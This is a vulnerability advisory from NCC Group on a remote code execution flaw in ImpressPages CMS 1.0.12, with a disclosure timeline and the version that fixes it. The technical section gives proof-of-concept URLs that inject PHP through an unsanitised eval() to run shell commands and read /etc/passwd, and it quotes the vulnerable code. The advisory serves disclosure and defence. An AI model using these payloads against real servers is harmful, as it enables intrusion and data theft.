Back
NCC Group Publication Archive
Cyber Security
Technical advisories

November 5, 2015

1 min read

Remote code execution in ImpressPages CMS

Summary

Name: Remote code execution in ImpressPages CMS
Release Date:  5 January 2012
Reference: NGS00109
Discoverer: David Middlehurst 
Vendor: ImpressPages
Vendor Reference:
Systems Affected: ImpressPages CMS 1.0.12
Risk: High
Status: Published

TimeLine

Discovered: 28 August 2011
Released: 28 August 2011
Approved: 28 August 2011
Reported:  5 September 2011
Fixed: 21 September 2011
Published:  5 January 2012

Description

ImpressPages CMS (1.0.12) is prone to a remote command execution attack due to an unsanitised eval() code execution flaw.
 

Technical Details

http://host/impresspages/?cm_group=text_photostitleModule();echo%20shell_exec(‘ls%20-alh’);echo cm_name=test
http://host/impresspages/?cm_group=text_photostitleModule();echo%20file_get_contents(‘/etc/passwd’);echo cm_name=test
http://host/impresspages/?cm_group=text_photostitleModule();[[ArbitraryPHP Code Here]];echo cm_name=test

The affected code:
 
File: /ip_cms/modules/standard/content_management/actions.php Line 37
 
    if(isset($_REQUEST[‘cm_group’]) isset($_REQUEST[‘cm_name’])) {
      eval (‘ $new_module = new
Modulesstandardcontent_managementWidgets’.$_REQUEST[‘cm_group’].”.$_REQUEST[‘cm_name’].’Module();
‘);
      $new_module->makeActions();
    }

Fix Information

Please update all instances of Impress Pages to the 1.0.13 release:
http://www.impresspages.org/news/impresspages-1-0-13-security-release/

Published by NCC Group Publication Archive

Here are some related articles you may find interesting

Ghidra nanoMIPS ISA module

Introduction In late 2023 and early 2024, the NCC Group Hardware and Embedded Systems practice undertook an engagement to reverse engineer baseband firmware on several smartphones. This included MediaTek 5G baseband firmware based on the nanoMIPS architecture. While we were aware of some nanoMIPS modules for Ghidra having been developed…

Hardware & Embedded Systems
Reverse Engineering
Tool Release

May 7, 2024

6 mins read

Sifting through the spines: identifying (potential) Cactus ransomware victims

Authored by Willem Zeeman and Yun Zheng Hu This blog is part of a series written by various Dutch cyber security firms that have collaborated on the Cactus ransomware group, which exploits Qlik Sense servers for initial access. To view all of them please check the central blog by Dutch…

Digital Forensics and Incident Response (DFIR)
Fox-IT and European Research
Vulnerability Research

April 25, 2024

7 mins read

Public Report – Confidential Mode for Hyperdisk – DEK Protection Analysis

During the spring of 2024, Google engaged NCC Group to conduct a design review of Confidential Mode for Hyperdisk (CHD) architecture in order to analyze how the Data Encryption Key (DEK) that encrypts data-at-rest is protected. The project was 10 person days and the goal is to validate that the…

Public Reports

April 12, 2024

1 min read

Previous post Next post

View articles by category

Most popular posts

Most recent posts

Call us before you need us.

Our experts will help you.

Get in touch